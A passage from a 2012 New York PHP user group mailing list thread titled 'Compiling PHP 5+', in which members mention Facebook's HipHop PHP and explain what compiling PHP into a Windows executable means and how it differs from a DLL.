> Let us know what you find. I've been itching to give it a whirl too but
> haven't had the time or excuse yet.
>
> JS
> --
> Jeff Slutz
> JSLEUTH LLC
> 3242 44th ST APT 3F
> Astoria, NY 11103
> c.
970.443.9390 > jeff at jeffslutz.com > > > > On Wed, Feb 29, 2012 at 3:33 PM, Anthony Papillion wrote: > >> On Wed, Feb 29, 2012 at 2:28 PM, Federico Ulfo >> wrote: >> > >> > Facebook Hip Hop PHP, >> > https://github.com/facebook/hiphop-php >> >> Thank you! I'd completely forgotten about Hip Hop. Never had a chance >> to use it and got away from PHP for a few months. Good excuse to give >> it a try on my dive back in. Thanks again. >> >> Anthony >> _______________________________________________ >> New York PHP User Group Community Talk Mailing List >> http://lists.nyphp.org/mailman/listinfo/talk >> >> http://www.nyphp.org/show-participation >> > > > _______________________________________________ > New York PHP User Group Community Talk Mailing List > http://lists.nyphp.org/mailman/listinfo/talk > > http://www.nyphp.org/show-participation > -------------- next part -------------- An HTML attachment was scrubbed... URL: From papillion at gmail.com Wed Feb 29 16:41:04 2012 From: papillion at gmail.com (Anthony Papillion) Date: Wed, 29 Feb 2012 15:41:04 -0600 Subject: [nycphp-talk] Compiling PHP 5+ In-Reply-To: References: Message-ID: Wed, Feb 29, 2012 at 3:01 PM, Charles Vasquez wrote: > > what is hip hop? When you speak about compiling do you mean creating a > windows dll or something? I am new to this type of speak, not new to php, > but the php community. I practice php for personal purposes. Hi Charles, Hip Hop is a technology developed by Facebook. It basically takes PHP source code and rewrites it as highly optimized C++ code (or maybe just C, I can't remember). It makes the code run faster and scale better for them. But by compiling, I mean creating a Windows executable. A program you can run directly without having to have the language interpreter on your machine. So I could write PHP code, compile it to a Windows executable and distribute that .exe file which people could run directly on their machines without having to have PHP installed. 
While a DLL is something pretty similar and is compiled, it's not quite the same thing. DLLs are more libraries of functions that programs can use while a program executable is the program itself.

That's probably clear as mud, I'm sure. I suck at explaining things.

Anthony

From jeff at jeffslutz.com Wed Feb 29 16:45:46 2012
From: jeff at jeffslutz.com (Jeff Slutz)
Date: Wed, 29 Feb 2012 16:45:46 -0500
Subject: [nycphp-talk] Compiling PHP 5+

I've no personal experience with these tools but there are lots of good references here:
http://stackoverflow.com/questions/3189100/php-compiler-for-windows

--
Jeff Slutz
JSLEUTH LLC
3242 44th ST APT 3F
Astoria, NY 11103
c. 970.443.9390
jeff at jeffslutz.com

On Wed, Feb 29, 2012 at 4:41 PM, Anthony Papillion wrote:
> On Wed, Feb 29, 2012 at 3:01 PM, Charles Vasquez wrote:
> >
> > What is hip hop? When you speak about compiling do you mean creating a
> > windows dll or something? I am new to this type of speak, not new to php,
> > but the php community. I practice php for personal purposes.
>
> Hi Charles,
>
> Hip Hop is a technology developed by Facebook. It basically takes PHP
> source code and rewrites it as highly optimized C++ code (or maybe
> just C, I can't remember). It makes the code run faster and scale
> better for them.
>
> But by compiling, I mean creating a Windows executable. A program you
> can run directly without having to have the language interpreter on
> your machine. So I could write PHP code, compile it to a Windows
> executable and distribute that .exe file which people could run
> directly on their machines without having to have PHP installed. While
> a DLL is something pretty similar and is compiled, it's not quite the
> same thing. DLLs are more libraries of functions that programs can
> use while a program executable is the program itself.
>
> That's probably clear as mud, I'm sure. I suck at explaining things.
>
> Anthony

From cvasquez39 at gmail.com Wed Feb 29 17:07:22 2012
From: cvasquez39 at gmail.com (Charles Vasquez)
Date: Wed, 29 Feb 2012 17:07:22 -0500
Subject: [nycphp-talk] Compiling PHP 5+

Thank you for sharing the knowledge!

Best,
Charles

On Wed, Feb 29, 2012 at 4:45 PM, Jeff Slutz wrote:
> I've no personal experience with these tools but there are lots of good
> references here:
> http://stackoverflow.com/questions/3189100/php-compiler-for-windows
>
> --
> Jeff Slutz
> JSLEUTH LLC
> 3242 44th ST APT 3F
> Astoria, NY 11103
> c. 970.443.9390
> jeff at jeffslutz.com
>
> On Wed, Feb 29, 2012 at 4:41 PM, Anthony Papillion wrote:
>
>> On Wed, Feb 29, 2012 at 3:01 PM, Charles Vasquez wrote:
>> >
>> > What is hip hop? When you speak about compiling do you mean creating a
>> > windows dll or something? I am new to this type of speak, not new to php,
>> > but the php community. I practice php for personal purposes.
>>
>> Hi Charles,
>>
>> Hip Hop is a technology developed by Facebook. It basically takes PHP
>> source code and rewrites it as highly optimized C++ code (or maybe
>> just C, I can't remember). It makes the code run faster and scale
>> better for them.
>>
>> But by compiling, I mean creating a Windows executable. A program you
>> can run directly without having to have the language interpreter on
>> your machine. So I could write PHP code, compile it to a Windows
>> executable and distribute that .exe file which people could run
>> directly on their machines without having to have PHP installed. While
>> a DLL is something pretty similar and is compiled, it's not quite the
>> same thing. DLLs are more libraries of functions that programs can
>> use while a program executable is the program itself.
>>
>> That's probably clear as mud, I'm sure. I suck at explaining things.
>>
>> Anthony